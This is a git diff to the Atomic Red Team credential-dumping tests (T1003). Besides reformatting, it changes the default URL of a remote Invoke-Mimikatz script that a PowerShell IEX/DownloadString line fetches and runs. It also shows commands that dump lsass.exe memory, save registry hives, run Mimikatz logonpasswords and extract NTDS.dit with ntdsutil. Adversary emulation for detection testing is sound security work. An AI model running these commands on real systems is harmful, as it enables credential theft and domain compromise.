diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 08ae0d1d..d95dfdcf 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -162,7 +162,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
+| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
@@ -219,7 +219,7 @@ reg save HKLM\security security
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
@@ -238,7 +238,7 @@ procdump.exe -accepteula -ma lsass.exe #{output_file}
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
@@ -246,11 +246,11 @@ Manager and administrative permissions.
#### Run it with these steps!
1. Open Task Manager:
- On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
- If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -261,7 +261,7 @@ Manager and administrative permissions.
## Atomic Test #7 - Offline Credential Theft With Mimikatz
-The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
@@ -287,8 +287,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
-The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
-uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 25dff4ff..a9068796 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -12,7 +12,7 @@ atomic_tests:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
- default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+ default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
@@ -58,7 +58,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
@@ -74,7 +74,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
@@ -82,11 +82,11 @@ atomic_tests:
name: manual
steps: |
1. Open Task Manager:
- On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
- If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -95,7 +95,7 @@ atomic_tests:
- name: Offline Credential Theft With Mimikatz
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+ The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
@@ -118,8 +118,8 @@ atomic_tests:
- name: Dump Active Directory Database with NTDSUtil
description: |
- The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
- uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+ The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+ uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
@@ -131,4 +131,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
- ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
\ No newline at end of file
+ ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
diff --git a/atomics/index.yaml b/atomics/index.yaml
index a9fea2b5..efb0ed19 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -13445,7 +13445,7 @@ credential-access:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
- default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+ default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
@@ -13492,9 +13492,9 @@ credential-access:
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. This can be achieved with Sysinternals \nProcDump. The tool
- may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
@@ -13508,25 +13508,28 @@ credential-access:
'
- name: Dump LSASS.exe Memory using Windows Task Manager
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. This can be achieved with the Windows Task \nManager and administrative
- permissions.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+ Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
- steps: "1. Open Task Manager:\n On a Windows system this can be accomplished
- by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
- \n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n
- \ If lsass.exe is not visible, select \"Show processes from all users\".
- This will allow you to observe execution of lsass.exe \n and select it
- for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe
- in Task Manager. Select \"Create Dump File\". The following dialog will
- show you the path to the saved file.\n"
+ steps: |
+ 1. Open Task Manager:
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ on the task bar and selecting "Task Manager".
+
+ 2. Select lsass.exe:
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ and select it for manipulation.
+
+ 3. Dump lsass.exe memory:
+ Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. Adversaries commonly perform this offline analysis with \nMimikatz.
- This tool is available at https://github.com/gentilkiwi/mimikatz.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
@@ -13546,11 +13549,10 @@ credential-access:
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
- description: "The Active Directory database NTDS.dit may be dumped using NTDSUtil
- for offline credential theft attacks. This capability \nuses the \"IFM\" or
- \"Install From Media\" backup functionality that allows Active Directory restoration
- or installation of \nsubsequent domain controllers without the need of network-based
- replication.\n"
+ description: |
+ The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+ uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+ subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
@@ -13560,7 +13562,9 @@ credential-access:
default: C:\Atomic_Red_Team
executor:
name: command_prompt
- command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q'
+ command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
+
+'
T1081:
technique:
id: attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c